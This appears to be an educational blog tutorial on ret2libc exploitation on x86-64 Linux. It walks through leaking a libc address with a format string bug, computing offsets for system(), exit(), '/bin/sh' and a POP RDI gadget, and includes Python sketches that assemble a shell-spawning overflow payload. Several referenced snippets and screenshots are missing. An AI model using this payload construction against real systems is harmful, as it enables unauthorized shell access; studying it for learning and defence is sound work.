Return to Libc: Linux Exploit Development
This blog post covers how to conduct a ret2libc attack. The ret2libc technique is a tactic used in Linux exploit development that allows attackers to call functions in libc (the standard C library). If the attacker can overwrite a return address in a vulnerable process, then the attacker may be able to use this technique to execute system("/bin/sh") and obtain a working shell. This technique may be used to bypass Data Execution Prevention (DEP), an exploit mitigation that prevents code from being executed in non-executable regions of memory.
This technique requires the attacker to know the virtual address at which libc was loaded at runtime. If Address Space Layout Randomization (ASLR) is enabled (which it will be for this tutorial), then the attacker must calculate this base address from a pointer obtained through a separate memory-leak vulnerability, such as a format string vulnerability. Once the attacker knows the base address, the attacker can add fixed offsets to it in order to calculate the addresses of other important functions and variables, such as the system() function or the "/bin/sh" string.
Overwriting the Return Address
Below is a code snippet for a vulnerable program.
When this program is executed, it simply repeats anything that is typed in as input until the user tells the program to quit.
Note that there is a vulnerable call to fgets() in the program, which allows an attacker to copy up to 1000 bytes of data into the 100-byte-long buffer buf. The attacker can use this buffer overflow vulnerability to overwrite the return address once 120 bytes have been entered into the program (assuming that the first four characters are "quit"). In the example shown below, the return address has been overwritten with an attacker-controlled value of 0x4242424242424242 (0x42 is the ASCII code for "B").
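The layout of such an overflow input can be sketched in a few lines of Python. This is only an illustration built from the numbers in the paragraph above (120 bytes to reach the return address, "quit" as the first four characters); the variable names are made up for this sketch, and the snippet does not talk to the target program.

```python
import struct

BYTES_TO_RET = 120                      # distance to the saved return address (from the text)
prefix = b"quit"                        # first four characters, as the text assumes
filler = b"A" * (BYTES_TO_RET - len(prefix))       # remaining 116 bytes of padding
ret_addr = struct.pack("<Q", 0x4242424242424242)   # 8 bytes, little-endian: b"BBBBBBBB"

payload = prefix + filler + ret_addr
print(len(payload), payload[-8:])
```

The value is packed as a little-endian 64-bit integer because that is how x86-64 stores addresses in memory. With a repeated byte like 0x42 the byte order makes no visible difference, but it matters as soon as a real address is used.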
One interesting thing to note about ASLR is that while it does modify the locations of certain variables and functions, it usually does not modify the offsets of these variables and functions. For example, suppose that, while debugging a running process, we hit a breakpoint and notice that there is some stack variable x at location 0x7ffffffff000 and another stack variable y at location 0x7ffffffff100. Assuming ASLR is enabled, if we were to rerun the process a second time and see that x is now stored at location 0x7ffffffff510 when we hit the same breakpoint, then we would expect that y would be located at 0x7ffffffff610. In other words, even though the addresses of each variable get modified, x and y continue to have an offset of exactly 0x100 bytes away from each other in each instance of the program.
This happens because ASLR does not randomize the location of every variable in a program individually, which would be impractical. Instead, ASLR randomizes the base addresses of the memory mappings, so the distance between two variables in the same memory mapping rarely changes.
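The x and y example can be checked with simple arithmetic. The sketch below uses the addresses quoted above for the two runs; the dictionary layout and helper name are just illustrative choices.

```python
# Addresses of the stack variables x and y in two separate runs (from the text).
run1 = {"x": 0x7ffffffff000, "y": 0x7ffffffff100}
run2 = {"x": 0x7ffffffff510, "y": 0x7ffffffff610}

def offset(run):
    """Distance between y and x within a single run."""
    return run["y"] - run["x"]

# How far the whole mapping moved between the two runs.
slide = run2["x"] - run1["x"]

print(hex(offset(run1)), hex(offset(run2)), hex(slide))
```

Both variables move by the same amount between runs, which is why the distance between them stays the same.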
Of course, there are exceptions to this rule of rarely changing offsets. If x was a heap variable while y was a stack variable, then there would be a far greater chance for the offsets to change since the heap and the stack are loaded into two very separate memory mappings. Furthermore, if we were to use two different breakpoints at two different locations of the program, then there would be a greater chance for one of the variables to have been deleted or moved somewhere else due to the constantly changing nature of the stack. However, for the purposes of conducting a ret2libc attack, this is a perfect scenario because if we know the address where the libc library is loaded, then we know we can add the value of an unchanging offset to that address to obtain the address of a function within the libc library.
There are four main steps to completing a basic return-to-libc attack:
1. Obtain an address that points to something within the libc library using something like a format string vulnerability (only required if ASLR is enabled).
2. Use the address from step 1 to calculate the base address of the libc library.
3. Calculate the addresses of the libc functions you would like to jump to by using the base address of the libc library.
4. Use a different vulnerability, such as a buffer overflow, to overwrite the return address with the address of the libc function that you would like to jump to (you can also use ROP chains to jump to multiple libc functions).
Finding Libc Base Address
Our first step is to use a format string vulnerability to leak an address from the stack that points to a function or variable in the libc library. To see the entire memory mapping of a specific running instance of the program, we can start the program in GDB with the r command, hit Ctrl-C while the program is running, and use the vmmap command (which is provided by GDB extensions such as GEF or pwndbg rather than by stock GDB). Note that these addresses can change if you rerun the program.
In this instance of the program, the base of libc is at 0x7ffff7def000, and the end of libc is at 0x7ffff7fb0000 (both addresses are highlighted). If we exploit the format string vulnerability, we can see that the fifth pointer printed out from the stack (also highlighted) points to an address that is within the libc library, so this will be the address that we are going to use.
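As a rough sketch of how a script might pick out that fifth pointer, the snippet below parses a line of space-separated %p output and checks that the value lies inside the libc mapping. The sample line is hypothetical: only its fifth value and the two mapping boundaries come from this post, and the other fields are placeholders.

```python
LIBC_START = 0x7ffff7def000   # base of libc in this instance (from the text)
LIBC_END = 0x7ffff7fb0000     # end of libc in this instance (from the text)

def nth_pointer(leak: str, n: int) -> int:
    """Return the n-th (1-based) pointer from space-separated %p output."""
    token = leak.split()[n - 1]
    # glibc prints a NULL pointer as "(nil)" when formatting with %p.
    return 0 if token == "(nil)" else int(token, 16)

# Hypothetical leak output; only the fifth field is taken from the post.
sample = "0x1 (nil) 0x3 0x4 0x7ffff7fadbe0"

fifth = nth_pointer(sample, 5)
inside_libc = LIBC_START <= fifth < LIBC_END
print(hex(fifth), inside_libc)
```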
If we subtract the base of libc from the fifth pointer, we get 0x7ffff7fadbe0 - 0x7ffff7def000 = 0x1bebe0. In other words, if we subtract an offset of 0x1bebe0 from the value of the fifth pointer, then we can obtain the address of the base of libc. We can use this information to start creating an exploit script with pwntools.
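The subtraction can be written as a small helper. This is a minimal sketch rather than the post's actual script: the function name is made up, and the page-alignment check is an added sanity test based on the fact that memory mappings start on page boundaries (4 KiB pages are assumed here).

```python
LEAK_TO_BASE = 0x1bebe0   # offset of the leaked pointer from the libc base (from the text)

def libc_base_from_leak(leaked: int) -> int:
    """Recover the libc base address from the leaked fifth pointer."""
    base = leaked - LEAK_TO_BASE
    # Assumed sanity check: a mapping base should be 4 KiB page aligned.
    if base & 0xfff:
        raise ValueError(f"suspicious libc base {base:#x}")
    return base

print(hex(libc_base_from_leak(0x7ffff7fadbe0)))
```

Because the offset is fixed, the same helper works for any run of the program. Only the leaked value changes.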
Finding Other Addresses
Our next step is to obtain the address of system(), which is located in the libc library. On many x86-64 Debian-based systems, libc is stored in a file such as /usr/lib/x86_64-linux-gnu/libc-2.31.so (the exact path and version vary by distribution), so we can use the following command to obtain the offset of system() from the base of libc.
The offset is 0x48df0, meaning that if we add 0x48df0 to the libc_base variable we created in the Python script earlier, we should get the address of system().
Since our goal is to call system("/bin/sh"), we'll also need to have a pointer to the string “/bin/sh”. Because libc uses this string in its code, this string is also located within the libc library, and we can use GDB to look for it.
Note that the parameters for the above find command are the beginning and end of the libc memory mapping for that instance. The command gave us an address of 0x7ffff7f79156, which has an offset of 0x7ffff7f79156 - 0x7ffff7def000 = 0x18a156.
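As an alternative to searching in GDB, the string can also be located by scanning the raw bytes of the libc file. The helper below is a hypothetical sketch, not the method used in this post. It assumes that the file offset of the string equals its offset from the load base, which is commonly the case for libc's read-only data but is not guaranteed, so the result should be confirmed in a debugger.

```python
def find_string_offset(image: bytes, needle: bytes = b"/bin/sh\x00") -> int:
    """Return the offset of the first NUL-terminated occurrence of needle."""
    offset = image.find(needle)
    if offset < 0:
        raise ValueError("string not found in image")
    return offset

# Tiny synthetic stand-in for a library image, used only to show the call.
fake_image = b"\x00" * 16 + b"/bin/sh\x00" + b"\x00" * 8
print(hex(find_string_offset(fake_image)))
```

Against a real library the call would look like `find_string_offset(open(path, "rb").read())`, where `path` is the libc file on the target system.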
We'll also need a POP RDI ROP gadget, which will allow us to load a pointer to the "/bin/sh" string into RDI, the register that holds the first function argument in the x86-64 System V calling convention. We can use the command shown below to obtain a POP RDI gadget.
The gadget at offset 0x26796 seems suitable for our purposes.
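For intuition about what a gadget finder looks for: on x86-64, POP RDI followed by RET is encoded as the two bytes 0x5f 0xc3. The sketch below lists every position of that byte pair in a buffer. It is a simplified illustration with made-up names and sample bytes, not a replacement for a real gadget tool, which also restricts the search to executable segments.

```python
POP_RDI_RET = bytes([0x5f, 0xc3])   # machine code for: pop rdi ; ret

def find_gadgets(code: bytes, pattern: bytes = POP_RDI_RET) -> list:
    """Return every offset at which pattern occurs in code."""
    offsets = []
    start = code.find(pattern)
    while start != -1:
        offsets.append(start)
        start = code.find(pattern, start + 1)
    return offsets

# Sample bytes: nop ; pop rdi ; ret ; pop r15 ; ret
sample_code = bytes([0x90, 0x5f, 0xc3, 0x41, 0x5f, 0xc3])
print(find_gadgets(sample_code))
```

The second match sits inside the encoding of POP R15 (0x41 0x5f). Jumping one byte into that instruction yields a usable POP RDI gadget, which is why such gadgets are common even in code that never pops RDI directly.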
The last offset we need is that of the exit() function, which will allow us to cleanly exit the program once we're done using our shell. We can find this offset the same way we found the offset of system().
We'll use the first result, 0x3e600, and ignore the other matches.
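With all four offsets collected, turning them into runtime addresses is a single addition each. The following is a minimal sketch using the offsets found in this section; the dictionary keys and the function name are illustrative.

```python
# Offsets from the base of libc, as found in this section.
OFFSETS = {
    "system": 0x48df0,
    "exit": 0x3e600,
    "bin_sh": 0x18a156,
    "pop_rdi": 0x26796,
}

def resolve(libc_base: int) -> dict:
    """Translate each libc-relative offset into an absolute address."""
    return {name: libc_base + off for name, off in OFFSETS.items()}

addresses = resolve(0x7ffff7def000)
for name, addr in addresses.items():
    print(f"{name:8s} {addr:#x}")
```

For the instance examined earlier, the resolved "/bin/sh" address matches the 0x7ffff7f79156 that GDB reported, which is a quick way to confirm that the base and offsets are consistent.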
Putting It All Together
Using the information we gathered in the previous section, we can generate the following exploit script:
First, we use the format string vulnerability to leak an address that allows us to calculate the base of libc. Next, we add various offsets to this base value in order to obtain the addresses we need to use in our exploit. Once that is done, we generate a ROP chain that does the following:
Starts with the string "quit" so that the program breaks out of its loop and eventually executes a RET instruction.
Sends 116 bytes of A's to fill the space up to the saved return address.
Overwrites the return address with the address of the POP RDI gadget.
Places the address of "/bin/sh" next on the stack, so that the gadget pops it into RDI.
Places the address of system() after that, so that the RET ending the gadget jumps to system() with RDI pointing to "/bin/sh".
Places the address of exit() last, so that system() returns into exit() once the shell is closed.
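The chain described above can be assembled with nothing more than the struct module. This sketch is not the post's pwntools script: it only builds the bytes, using the offsets gathered earlier, and the function name is hypothetical. Sending the payload and handling the leak are left out.

```python
import struct

def build_payload(libc_base: int) -> bytes:
    """Build the overflow input: 'quit', padding, then the four-entry chain."""
    pop_rdi = libc_base + 0x26796    # pop rdi ; ret gadget
    bin_sh = libc_base + 0x18a156    # "/bin/sh" string inside libc
    system = libc_base + 0x48df0     # system()
    exit_fn = libc_base + 0x3e600    # exit()

    # Each entry is a little-endian 64-bit value, in the order the CPU consumes them.
    chain = struct.pack("<QQQQ", pop_rdi, bin_sh, system, exit_fn)
    return b"quit" + b"A" * 116 + chain

payload = build_payload(0x7ffff7def000)
print(len(payload))
```

The order of the four entries mirrors the list above: the gadget address lands on the saved return address, and each later entry is consumed by the POP or RET that follows it.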
When we run this script, we successfully conduct a ret2libc attack against the binary and get a working shell!